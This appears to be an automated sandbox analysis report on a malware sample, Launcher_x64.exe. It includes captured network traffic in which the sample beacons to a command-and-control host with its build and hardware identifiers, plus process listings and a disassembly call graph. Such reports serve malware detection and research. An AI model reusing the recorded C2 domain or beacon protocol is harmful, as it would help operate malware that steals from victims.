                                                                                        Set-Cookie: PHPSESSID=m000lar6g8d5qpo6aocb5dr25r; expires=Sat, 26 Apr 2025 10:24:06 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bR%2BY3TyiTaS0%2BMPu2yyb%2BoH3FwL5oAl925%2BFTulJdLAWhOR6ADHuzfRdVoy4n0Qz1OdBEHFFdMF0cY1Bo3YVWbSjhHB8mQUkcAc%2FsLYQGUECpWFc419wGa5yPDyzeMT3YIUsEdc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb1b8180ede95-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1500&min_rtt=1493&rtt_var=574&sent=217&recv=602&lost=0&retrans=0&sent_bytes=2846&recv_bytes=586687&delivery_rate=1882656&cwnd=240&unsent_bytes=0&cid=20bb10a0b4cb5b88&ts=2277&x=0"


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.449742188.114.97.34437372C:\Users\user\Desktop\Launcher_x64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:37:29 UTC266OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 89
                                                                                        Host: undesirabkel.click
                                                                                        2024-12-31 16:37:29 UTC89OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 73 77 65 74 61 6d 75 62 63 6f 79 75 26 6a 3d 26 68 77 69 64 3d 35 44 39 32 34 39 30 43 35 36 41 46 45 30 31 37 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37
                                                                                        Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--swetamubcoyu&j=&hwid=5D92490C56AFE01792A467F615F074C7
                                                                                        2024-12-31 16:37:29 UTC1131INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:37:29 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=i1em279hkas6i2af2i3h5ruhs5; expires=Sat, 26 Apr 2025 10:24:08 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T9yDly%2Bf5UJcpV%2Bh%2FHVhHZ1mNRhRXJLa9pCv2pwXnoD8DKKwkcDtUrpexDgO%2F2LtUf9Afsf8CgEgbQbngeRacCkxyn3U39McHDwW4fhktfTcmZ1j%2BOGfWlPlabneU9NZ1Jxz1lg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb1c98caa4234-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1672&min_rtt=1662&rtt_var=643&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=991&delivery_rate=1675272&cwnd=172&unsent_bytes=0&cid=aedd9280a9c2d9c9&ts=786&x=0"
                                                                                        2024-12-31 16:37:29 UTC238INData Raw: 33 36 37 63 0d 0a 66 6c 38 64 6a 32 32 79 70 35 58 34 66 68 72 41 4f 58 4d 68 68 69 74 35 42 41 61 37 59 32 2f 50 65 41 4c 57 65 63 52 35 53 61 59 6c 4a 44 2f 70 47 5a 43 64 70 4e 52 63 66 2b 49 44 51 67 32 6b 54 31 73 2b 4a 49 49 70 42 59 30 4e 62 61 55 66 6f 52 45 4e 6c 7a 52 72 4c 65 41 76 33 63 6e 79 76 52 70 77 71 77 30 38 55 4d 4a 44 54 56 78 69 6a 52 63 44 2f 6b 78 34 68 44 47 38 51 44 79 54 43 53 31 77 75 51 54 61 6e 71 4f 39 4c 6c 2b 75 55 79 42 47 77 55 49 63 52 56 53 4a 4c 44 75 6f 54 6d 32 5a 4d 61 77 64 65 39 64 4d 42 30 58 6c 49 2f 66 42 33 63 6f 69 4e 5a 4e 67 42 45 50 33 5a 7a 45 33 61 65 70 61 50 4b 6f 32 53 5a 63 59 6a 6b 30 4c 37 69 64 71 55 73 73 63 31 5a 50 77 76 6b 31 2f 73 6d 4d 58
                                                                                        Data Ascii: 367cfl8dj22yp5X4fhrAOXMhhit5BAa7Y2/PeALWecR5SaYlJD/pGZCdpNRcf+IDQg2kT1s+JIIpBY0NbaUfoRENlzRrLeAv3cnyvRpwqw08UMJDTVxijRcD/kx4hDG8QDyTCS1wuQTanqO9Ll+uUyBGwUIcRVSJLDuoTm2ZMawde9dMB0XlI/fB3coiNZNgBEP3ZzE3aepaPKo2SZcYjk0L7idqUssc1ZPwvk1/smMX
                                                                                        2024-12-31 16:37:29 UTC1369INData Raw: 52 4d 68 6d 4b 7a 78 67 32 55 67 41 71 30 39 32 6e 77 79 32 47 6e 43 56 4b 7a 45 70 39 77 62 4c 6b 66 7a 49 47 33 69 48 59 51 52 72 39 46 4e 50 53 30 33 4e 43 6c 69 64 4c 6d 57 51 4c 4c 51 49 4b 2f 55 2f 4b 6c 62 66 43 38 4f 56 70 61 67 59 62 70 5a 32 52 31 62 75 61 41 46 32 53 38 4d 58 4e 72 6f 39 61 4f 42 4c 72 68 45 74 6c 45 67 78 56 64 63 48 31 2b 4c 33 76 45 77 69 68 45 34 43 52 62 52 6e 4d 54 64 70 36 6c 6f 38 71 6a 5a 4a 6d 52 69 4f 54 53 50 69 4b 6d 70 34 75 42 7a 56 6b 76 43 2b 54 58 2b 79 62 52 64 45 79 78 73 72 50 47 44 5a 57 69 61 6c 4f 6e 65 35 43 70 51 63 49 65 4a 50 46 53 6d 2f 41 76 44 49 2b 35 38 2f 66 71 6f 4a 52 32 37 33 62 78 46 64 58 74 39 55 49 61 4e 4a 4e 71 77 72 6a 41 46 77 30 41 63 79 55 4d 68 62 32 39 2b 73 7a 6a 74 4b 6c 67 6f
                                                                                        Data Ascii: RMhmKzxg2UgAq092nwy2GnCVKzEp9wbLkfzIG3iHYQRr9FNPS03NClidLmWQLLQIK/U/KlbfC8OVpagYbpZ2R1buaAF2S8MXNro9aOBLrhEtlEgxVdcH1+L3vEwihE4CRbRnMTdp6lo8qjZJmRiOTSPiKmp4uBzVkvC+TX+ybRdEyxsrPGDZWialOne5CpQcIeJPFSm/AvDI+58/fqoJR273bxFdXt9UIaNJNqwrjAFw0AcyUMhb29+szjtKlgo
                                                                                        2024-12-31 16:37:29 UTC1369INData Raw: 67 74 65 59 74 34 75 58 35 31 41 5a 4c 52 41 6a 68 4d 4c 30 78 45 73 65 2b 6f 46 39 70 62 66 7a 45 35 31 67 6c 59 64 52 73 4e 50 45 32 38 79 39 42 49 72 70 30 78 61 73 6b 2b 77 46 58 69 53 42 41 31 56 39 31 54 45 6c 2f 69 31 4f 53 79 70 51 55 6f 58 77 33 73 73 61 6d 7a 6f 42 43 69 6d 48 55 4f 45 53 34 73 74 4c 70 41 52 45 46 58 6e 43 59 48 57 70 36 41 6d 63 49 35 38 46 57 6d 30 64 31 5a 58 58 38 77 42 48 6f 4d 77 4d 62 6b 6f 2f 53 6f 73 36 44 55 65 66 4d 56 5a 38 4f 2f 4d 7a 54 46 65 73 56 35 48 52 4d 41 59 48 48 5a 63 33 77 59 69 2f 79 6f 36 73 42 76 39 4d 79 50 6b 43 7a 42 75 36 51 6a 61 34 36 53 79 53 69 71 76 65 78 78 50 34 57 34 64 62 6d 32 50 4c 42 36 4c 45 44 61 4f 48 66 49 4e 4a 5a 64 4b 4a 55 2f 48 46 59 76 52 70 5a 55 7a 58 66 5a 51 43 78 69 77
                                                                                        Data Ascii: gteYt4uX51AZLRAjhML0xEse+oF9pbfzE51glYdRsNPE28y9BIrp0xask+wFXiSBA1V91TEl/i1OSypQUoXw3ssamzoBCimHUOES4stLpAREFXnCYHWp6AmcI58FWm0d1ZXX8wBHoMwMbko/Sos6DUefMVZ8O/MzTFesV5HRMAYHHZc3wYi/yo6sBv9MyPkCzBu6Qja46SySiqvexxP4W4dbm2PLB6LEDaOHfINJZdKJU/HFYvRpZUzXfZQCxiw
                                                                                        2024-12-31 16:37:29 UTC1369INData Raw: 4f 43 46 67 36 67 48 55 54 6c 4c 71 38 53 42 74 59 63 62 47 66 6f 47 73 76 58 70 35 74 56 53 4b 4a 37 41 58 6e 75 65 56 4a 6e 4d 4e 41 45 44 49 51 65 64 4b 59 4a 6e 52 67 72 78 77 6f 4c 57 65 4d 33 31 2b 4c 68 74 6b 68 44 6b 58 5a 48 62 73 56 35 54 44 5a 65 6a 78 6b 34 68 51 46 42 6c 51 2b 31 46 54 6e 6f 47 47 70 35 34 6a 33 6a 39 61 66 49 42 48 75 59 53 42 64 49 36 6e 64 57 66 45 7a 55 44 41 79 41 4a 43 32 53 4e 35 49 4c 48 2b 38 74 47 48 62 47 57 49 48 6d 38 35 77 48 4b 37 6b 49 4c 77 37 74 62 68 5a 6c 4d 2b 6b 74 58 59 49 72 62 34 38 65 6a 44 41 62 39 78 4d 32 63 4d 74 63 67 4f 4b 68 73 52 6f 6f 69 46 73 48 63 4f 68 54 45 55 73 2b 38 41 30 6e 6e 79 41 70 6a 69 4f 32 4b 51 66 4d 4b 32 74 4e 2f 51 47 47 77 73 57 43 53 33 6d 69 51 55 64 62 31 47 4d 42 50
                                                                                        Data Ascii: OCFg6gHUTlLq8SBtYcbGfoGsvXp5tVSKJ7AXnueVJnMNAEDIQedKYJnRgrxwoLWeM31+LhtkhDkXZHbsV5TDZejxk4hQFBlQ+1FTnoGGp54j3j9afIBHuYSBdI6ndWfEzUDAyAJC2SN5ILH+8tGHbGWIHm85wHK7kILw7tbhZlM+ktXYIrb48ejDAb9xM2cMtcgOKhsRooiFsHcOhTEUs+8A0nnyApjiO2KQfMK2tN/QGGwsWCS3miQUdb1GMBP
                                                                                        2024-12-31 16:37:29 UTC1369INData Raw: 41 72 43 68 34 34 69 69 49 55 68 6e 52 50 42 64 55 36 41 47 45 37 76 4b 50 42 45 44 72 58 45 5a 77 39 41 41 4f 64 6b 65 44 42 51 33 6b 41 56 37 35 50 66 63 34 66 73 41 61 42 55 7a 34 4a 39 32 58 2b 70 41 72 62 4b 6c 58 50 32 50 6b 53 69 6f 30 52 2b 67 6f 4f 50 67 5a 55 59 51 50 38 7a 45 73 2b 6c 45 4e 58 2f 31 66 39 50 37 32 76 6a 39 76 73 67 78 41 52 64 42 70 50 58 42 48 32 41 73 65 6e 79 51 74 6f 41 33 30 4b 52 4f 65 50 52 6c 30 2f 77 72 4c 6c 76 2b 35 42 48 43 46 63 52 30 54 72 58 67 68 62 45 37 77 4a 68 36 4b 44 44 43 31 4e 34 78 4e 4a 2b 38 77 44 43 71 36 4f 76 2b 51 32 72 77 50 58 72 4e 74 52 6e 66 4e 48 45 42 69 55 4e 55 61 47 6f 73 66 61 59 49 59 6a 44 73 38 79 51 73 34 65 76 70 56 2b 5a 58 52 71 42 73 78 6d 47 41 56 43 76 56 38 4f 6d 78 70 77 51
                                                                                        Data Ascii: ArCh44iiIUhnRPBdU6AGE7vKPBEDrXEZw9AAOdkeDBQ3kAV75Pfc4fsAaBUz4J92X+pArbKlXP2PkSio0R+goOPgZUYQP8zEs+lENX/1f9P72vj9vsgxARdBpPXBH2AsenyQtoA30KROePRl0/wrLlv+5BHCFcR0TrXghbE7wJh6KDDC1N4xNJ+8wDCq6Ov+Q2rwPXrNtRnfNHEBiUNUaGosfaYIYjDs8yQs4evpV+ZXRqBsxmGAVCvV8OmxpwQ
                                                                                        2024-12-31 16:37:29 UTC1369INData Raw: 4e 35 77 34 74 78 73 49 35 53 73 63 4b 4e 4e 43 33 4e 65 69 67 52 6c 4b 75 6b 38 62 45 38 34 64 44 6d 6c 42 77 31 73 35 6a 44 4a 7a 6d 45 36 68 43 77 50 6a 56 53 68 76 7a 6c 58 55 78 66 36 51 43 79 4f 72 59 42 68 48 76 78 68 4b 4e 31 50 56 43 68 33 6b 51 54 43 44 4e 6f 73 53 49 73 34 52 4a 58 47 37 43 4f 4c 64 6f 4a 73 63 59 76 52 44 49 57 6e 2b 45 67 78 58 51 59 78 52 56 2f 77 41 58 76 6c 4b 6b 53 6b 74 39 52 73 55 53 4d 51 64 68 65 58 53 6b 53 39 69 73 51 35 48 62 73 35 70 45 57 70 72 30 53 41 4f 2f 6b 74 4d 73 53 58 72 4d 77 6a 56 48 42 31 2f 31 69 4b 42 6c 4d 4b 56 56 55 75 4e 43 6a 68 77 35 32 46 4e 52 6a 44 59 4c 54 69 68 55 33 4c 69 45 34 55 7a 48 75 73 57 4d 56 66 58 4a 73 66 6a 2f 61 45 77 54 5a 70 77 45 45 7a 4d 55 52 46 4c 50 76 41 52 49 59 6f
                                                                                        Data Ascii: N5w4txsI5SscKNNC3NeigRlKuk8bE84dDmlBw1s5jDJzmE6hCwPjVShvzlXUxf6QCyOrYBhHvxhKN1PVCh3kQTCDNosSIs4RJXG7COLdoJscYvRDIWn+EgxXQYxRV/wAXvlKkSkt9RsUSMQdheXSkS9isQ5Hbs5pEWpr0SAO/ktMsSXrMwjVHB1/1iKBlMKVVUuNCjhw52FNRjDYLTihU3LiE4UzHusWMVfXJsfj/aEwTZpwEEzMURFLPvARIYo
                                                                                        2024-12-31 16:37:29 UTC1369INData Raw: 4c 51 6c 5a 73 4e 48 4e 6e 44 2b 56 59 44 37 75 71 45 53 56 4b 6c 2f 4d 47 4c 66 62 55 74 58 54 73 45 58 43 70 30 50 4b 66 30 54 6f 7a 4d 43 35 78 38 56 4b 63 30 71 6d 66 33 74 6c 69 51 6a 39 51 73 34 51 50 64 2f 47 7a 31 76 37 6c 45 6d 6d 6a 46 52 73 53 47 64 46 6a 72 4a 45 54 6c 34 34 51 2b 45 36 4e 53 54 45 56 69 76 56 78 52 6b 30 48 77 49 64 45 48 64 42 77 65 62 4a 43 33 75 54 37 41 56 65 4f 55 36 62 6c 53 39 49 38 61 55 77 73 41 75 62 5a 77 57 51 6e 65 33 57 30 45 79 64 34 38 57 43 36 67 37 61 75 59 67 74 52 34 35 30 68 59 4c 5a 2b 63 76 32 2b 50 69 69 52 4e 59 70 30 41 45 46 2f 77 41 53 6d 42 6f 30 52 42 57 6e 6b 46 46 6d 45 76 76 45 79 37 73 4e 52 35 38 78 56 6e 77 34 66 65 2f 53 6d 4f 6c 55 44 4a 7a 78 58 6f 57 66 47 66 53 46 51 4f 49 45 47 4f 51
                                                                                        Data Ascii: LQlZsNHNnD+VYD7uqESVKl/MGLfbUtXTsEXCp0PKf0TozMC5x8VKc0qmf3tliQj9Qs4QPd/Gz1v7lEmmjFRsSGdFjrJETl44Q+E6NSTEVivVxRk0HwIdEHdBwebJC3uT7AVeOU6blS9I8aUwsAubZwWQne3W0Eyd48WC6g7auYgtR450hYLZ+cv2+PiiRNYp0AEF/wASmBo0RBWnkFFmEvvEy7sNR58xVnw4fe/SmOlUDJzxXoWfGfSFQOIEGOQ
                                                                                        2024-12-31 16:37:29 UTC1369INData Raw: 44 55 48 52 78 38 35 53 44 32 6e 36 58 4c 4f 56 4f 42 51 51 56 51 74 48 4d 76 63 55 76 2b 44 55 53 4d 4a 43 32 6c 48 4b 45 4c 4f 4f 6f 32 41 7a 4c 54 51 75 69 4d 35 4c 55 39 55 5a 46 59 4f 55 50 53 47 43 35 31 55 63 34 57 48 2f 6f 4c 53 2b 49 63 6a 79 35 77 7a 68 45 6f 54 73 6f 34 67 70 37 66 6b 6a 78 78 38 41 73 51 53 63 64 76 54 33 52 52 30 41 77 74 6f 42 5a 51 72 78 57 33 48 58 48 73 46 32 64 5a 35 46 54 6e 37 73 4f 4a 4b 56 2f 33 43 78 56 73 78 33 73 2f 55 57 66 64 41 46 69 58 45 32 47 47 44 36 74 4e 43 76 55 5a 47 48 54 71 4c 4f 43 57 79 64 63 74 63 66 55 4b 4f 47 6a 71 59 52 64 6f 54 65 73 36 42 72 63 77 4e 6f 59 4c 72 41 77 68 34 77 77 4b 54 63 52 65 77 66 61 73 6d 55 74 35 38 30 6f 57 5a 37 45 65 4c 31 51 7a 39 43 63 65 6a 42 4e 70 6b 54 61 38 49
                                                                                        Data Ascii: DUHRx85SD2n6XLOVOBQQVQtHMvcUv+DUSMJC2lHKELOOo2AzLTQuiM5LU9UZFYOUPSGC51Uc4WH/oLS+Icjy5wzhEoTso4gp7fkjxx8AsQScdvT3RR0AwtoBZQrxW3HXHsF2dZ5FTn7sOJKV/3CxVsx3s/UWfdAFiXE2GGD6tNCvUZGHTqLOCWydctcfUKOGjqYRdoTes6BrcwNoYLrAwh4wwKTcRewfasmUt580oWZ7EeL1Qz9CcejBNpkTa8I
                                                                                        2024-12-31 16:37:29 UTC1369INData Raw: 75 4b 2f 59 46 69 2b 72 51 73 55 5a 30 39 55 41 62 56 65 39 4f 4f 46 5a 79 39 44 41 36 2b 51 31 42 6e 67 32 4b 53 79 75 55 4c 77 39 33 7a 56 33 55 33 71 66 41 54 45 4f 30 57 77 49 56 7a 6c 4d 4b 56 57 72 34 42 56 61 45 4d 45 47 63 46 49 59 2b 46 59 6c 4c 46 6b 33 2b 56 66 76 42 2f 4d 73 61 4b 5a 70 78 42 6d 7a 45 65 55 39 6d 5a 4e 77 35 42 76 67 4e 64 2b 59 66 67 53 73 4e 35 54 52 30 55 4f 41 4f 68 73 6e 41 76 52 74 77 71 31 55 57 55 2f 35 44 55 6e 4a 69 30 52 63 45 69 6b 78 31 6a 44 47 79 51 44 7a 67 45 78 51 32 75 55 62 4b 6e 71 4f 4b 42 6a 47 51 64 77 46 48 39 42 77 66 4e 45 4b 4b 41 69 65 35 45 6e 69 76 47 34 38 77 59 73 55 47 48 6d 6e 6e 48 2b 58 4c 6f 35 73 52 4b 36 63 4f 49 6b 50 76 66 69 78 74 66 76 30 75 47 6f 77 4c 52 34 5a 4d 38 42 30 61 77 51
                                                                                        Data Ascii: uK/YFi+rQsUZ09UAbVe9OOFZy9DA6+Q1Bng2KSyuULw93zV3U3qfATEO0WwIVzlMKVWr4BVaEMEGcFIY+FYlLFk3+VfvB/MsaKZpxBmzEeU9mZNw5BvgNd+YfgSsN5TR0UOAOhsnAvRtwq1UWU/5DUnJi0RcEikx1jDGyQDzgExQ2uUbKnqOKBjGQdwFH9BwfNEKKAie5EnivG48wYsUGHmnnH+XLo5sRK6cOIkPvfixtfv0uGowLR4ZM8B0awQ


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:11:37:08
                                                                                        Start date:31/12/2024
                                                                                        Path:C:\Users\user\Desktop\Launcher_x64.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\Launcher_x64.exe"
                                                                                        Imagebase:0xd60000
                                                                                        File size:825'856 bytes
                                                                                        MD5 hash:741EE77540764D0C3EAB3F6FA16F5F37
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:1
                                                                                        Start time:11:37:08
                                                                                        Start date:31/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:11:37:08
                                                                                        Start date:31/12/2024
                                                                                        Path:C:\Users\user\Desktop\Launcher_x64.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\Launcher_x64.exe"
                                                                                        Imagebase:0xd60000
                                                                                        File size:825'856 bytes
                                                                                        MD5 hash:741EE77540764D0C3EAB3F6FA16F5F37
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:11:37:08
                                                                                        Start date:31/12/2024
                                                                                        Path:C:\Users\user\Desktop\Launcher_x64.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\Launcher_x64.exe"
                                                                                        Imagebase:0xd60000
                                                                                        File size:825'856 bytes
                                                                                        MD5 hash:741EE77540764D0C3EAB3F6FA16F5F37
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:7.3%
                                                                                          Dynamic/Decrypted Code Coverage:0.4%
                                                                                          Signature Coverage:1.1%
                                                                                          Total number of Nodes:2000
                                                                                          Total number of Limit Nodes:37
                                                                                          execution_graph 18385 d670f0 18390 d68e7d 18385->18390 18387 d67103 18394 d67294 18387->18394 18391 d68e89 __EH_prolog3 18390->18391 18397 d68da7 18391->18397 18393 d68edb std::ios_base::_Init 18393->18387 18462 d672a9 18394->18462 18406 d67f7f 18397->18406 18399 d68db2 18414 d66c10 18399->18414 18401 d68dc5 18402 d68ddf 18401->18402 18403 d64e30 std::ios_base::_Init 39 API calls 18401->18403 18404 d68deb 18402->18404 18418 d69dcd 18402->18418 18403->18402 18404->18393 18407 d67f8b __EH_prolog3 18406->18407 18408 d64e30 std::ios_base::_Init 39 API calls 18407->18408 18409 d67fbc 18408->18409 18410 d67153 std::ios_base::_Init 3 API calls 18409->18410 18411 d67fc3 18410->18411 18413 d67fd4 std::ios_base::_Init 18411->18413 18423 d677f2 18411->18423 18413->18399 18415 d66c57 18414->18415 18416 d631c0 76 API calls 18415->18416 18417 d66c6d std::ios_base::_Ios_base_dtor 18416->18417 18417->18401 18419 d674e4 std::_Lockit::_Lockit 7 API calls 18418->18419 18420 d69ddb 18419->18420 18421 d67515 std::_Lockit::~_Lockit 2 API calls 18420->18421 18422 d69e16 18421->18422 18422->18404 18424 d677fe __EH_prolog3 18423->18424 18425 d674e4 std::_Lockit::_Lockit 7 API calls 18424->18425 18426 d67809 18425->18426 18434 d6783a 18426->18434 18435 d676ef 18426->18435 18428 d67515 std::_Lockit::~_Lockit 2 API calls 18431 d67877 std::ios_base::_Init 18428->18431 18429 d6781c 18441 d67885 18429->18441 18431->18413 18434->18428 18436 d67153 std::ios_base::_Init 3 API calls 18435->18436 18437 d676fa 18436->18437 18438 d6770e 18437->18438 18449 d67783 18437->18449 18438->18429 18442 d67824 18441->18442 18443 d67891 18441->18443 18445 d67670 18442->18445 18452 d69c74 18443->18452 18446 d6767e 18445->18446 18448 d6768a ___std_exception_copy codecvt 18445->18448 18447 d72a5e __freea 14 API calls 18446->18447 18446->18448 18447->18448 18448->18434 18450 d67670 _Yarn 14 API calls 18449->18450 18451 d6770c 18450->18451 18451->18429 18453 d69c84 EncodePointer 18452->18453 18460 d71f83 18452->18460 18453->18442 18453->18460 18454 d77ae0 std::locale::_Setgloballocale 2 API calls 18454->18460 18455 d71f9d IsProcessorFeaturePresent 18455->18460 18456 d77b07 std::locale::_Setgloballocale 48 API calls 18456->18460 18457 d6f18f std::locale::_Setgloballocale 21 API calls 18457->18460 18458 d71a60 std::locale::_Setgloballocale 8 API calls 18458->18460 18459 d7446d __CreateFrameInfo 23 API calls 18459->18460 18460->18454 18460->18455 18460->18456 18460->18457 18460->18458 18460->18459 18461 d7446c 18460->18461 18461->18442 18463 d672bf 18462->18463 18464 d672b8 18462->18464 18471 d70ffb 18463->18471 18468 d7106c 18464->18468 18467 d6710d 18469 d70ffb std::ios_base::_Init 32 API calls 18468->18469 18470 d7107e 18469->18470 18470->18467 18474 d7125e 18471->18474 18475 d7126a ___scrt_is_nonwritable_in_current_image 18474->18475 18482 d71d11 EnterCriticalSection 18475->18482 18477 d71278 18483 d71082 18477->18483 18479 d71285 18493 d712ad 18479->18493 18482->18477 18484 d7109d 18483->18484 18485 d71110 std::_Locinfo::_Locinfo_dtor 18483->18485 18484->18485 18486 d710f0 18484->18486 18487 d7c065 std::ios_base::_Init 32 API calls 18484->18487 18485->18479 18486->18485 18488 d7c065 std::ios_base::_Init 32 API calls 18486->18488 18489 d710e6 18487->18489 18490 d71106 18488->18490 18491 d756b7 ___free_lconv_mon 14 API calls 18489->18491 18492 d756b7 ___free_lconv_mon 14 API calls 18490->18492 18491->18486 18492->18485 18496 d71d28 LeaveCriticalSection 18493->18496 18495 d7102c 18495->18467 18496->18495 19639 d651f0 19640 d65237 19639->19640 19641 d6520f 19639->19641 19649 d65440 19640->19649 19645 d65390 19641->19645 19643 d6522f 19646 d653da std::ios_base::_Init 19645->19646 19653 d65530 19646->19653 19650 d65487 std::ios_base::_Init 19649->19650 19651 d65530 std::ios_base::_Init 30 API calls 19650->19651 19652 d654bc 19651->19652 19652->19643 19666 d65730 19653->19666 19657 d6556f std::ios_base::_Init 19658 d65730 std::ios_base::_Init 5 API calls 19657->19658 19665 d655a8 std::ios_base::_Init 19657->19665 19659 d65602 19658->19659 19673 d65850 19659->19673 19663 d671d1 _ValidateLocalCookies 5 API calls 19664 d653f9 19663->19664 19664->19643 19665->19663 19667 d6574b std::ios_base::_Init 19666->19667 19668 d671d1 _ValidateLocalCookies 5 API calls 19667->19668 19669 d6555d 19668->19669 19669->19657 19670 d657b0 19669->19670 19680 d67974 19670->19680 19675 d6587e std::ios_base::_Init 19673->19675 19674 d671d1 _ValidateLocalCookies 5 API calls 19676 d65619 19674->19676 19675->19674 19677 d658f0 19676->19677 19694 d65990 19677->19694 19685 d67a0d 19680->19685 19683 d6a45c Concurrency::cancel_current_task RaiseException 19684 d67993 19683->19684 19688 d667c0 19685->19688 19689 d66801 std::bad_exception::bad_exception 19688->19689 19690 d6aa5d ___std_exception_copy 29 API calls 19689->19690 19691 d66820 19690->19691 19692 d671d1 _ValidateLocalCookies 5 API calls 19691->19692 19693 d6682a 19692->19693 19693->19683 19697 d659b0 19694->19697 19698 d659c7 std::ios_base::_Init 19697->19698 19701 d62b20 19698->19701 19702 d62b3f 19701->19702 19707 d62b33 19701->19707 19703 d62b5f 19702->19703 19704 d62b4c 19702->19704 19716 d62c30 19703->19716 19708 d62bc0 19704->19708 19707->19665 19709 d62be3 19708->19709 19710 d62bde 19708->19710 19711 d62c30 std::ios_base::_Init 3 API calls 19709->19711 19719 d62c50 19710->19719 19713 d62bee 19711->19713 19715 d62bfb 19713->19715 19723 d71a0f 19713->19723 19715->19707 19717 d67153 std::ios_base::_Init 3 API calls 19716->19717 19718 d62c42 19717->19718 19718->19707 19720 d62c68 std::ios_base::_Init 19719->19720 19721 d6a45c Concurrency::cancel_current_task RaiseException 19720->19721 19722 d62c7d 19721->19722 19724 d71c4e __strnicoll 29 API calls 19723->19724 19725 d71a1e 19724->19725 19726 d71a2c __Getctype 11 API calls 19725->19726 19727 d71a2b 19726->19727 19738 d75bf0 19739 d75c0b 19738->19739 19740 d75bfb 19738->19740 19744 d75cf5 19740->19744 19743 d756b7 ___free_lconv_mon 14 API calls 19743->19739 19745 d75d0a 19744->19745 19749 d75d10 19744->19749 19746 d756b7 ___free_lconv_mon 14 API calls 19745->19746 19746->19749 19747 d756b7 ___free_lconv_mon 14 API calls 19748 d75d1c 19747->19748 19750 d756b7 ___free_lconv_mon 14 API calls 19748->19750 19749->19747 19751 d75d27 19750->19751 19752 d756b7 ___free_lconv_mon 14 API calls 19751->19752 19753 d75d32 19752->19753 19754 d756b7 ___free_lconv_mon 14 API calls 19753->19754 19755 d75d3d 19754->19755 19756 d756b7 ___free_lconv_mon 14 API calls 19755->19756 19757 d75d48 19756->19757 19758 d756b7 ___free_lconv_mon 14 API calls 19757->19758 19759 d75d53 19758->19759 19760 d756b7 ___free_lconv_mon 14 API calls 19759->19760 19761 d75d5e 19760->19761 19762 d756b7 ___free_lconv_mon 14 API calls 19761->19762 19763 d75d69 19762->19763 19764 d756b7 ___free_lconv_mon 14 API calls 19763->19764 19765 d75d77 19764->19765 19770 d75e6e 19765->19770 19771 d75e7a ___scrt_is_nonwritable_in_current_image 19770->19771 19786 d71d11 EnterCriticalSection 19771->19786 19773 d75eae 19787 d75ecd 19773->19787 19776 d75e84 19776->19773 19777 d756b7 